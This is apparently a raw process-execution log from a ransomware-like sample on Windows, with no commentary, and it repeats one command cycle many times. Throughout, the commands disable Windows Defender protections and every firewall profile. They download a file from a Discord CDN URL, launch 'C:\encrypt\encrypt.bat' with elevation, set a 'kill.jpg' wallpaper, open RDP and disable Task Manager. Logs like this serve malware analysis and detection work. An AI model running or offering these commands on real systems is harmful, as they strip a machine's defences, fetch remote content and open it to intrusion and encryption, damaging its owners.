C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,17492435568577190129,1412443482916418140,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5544 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters


C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

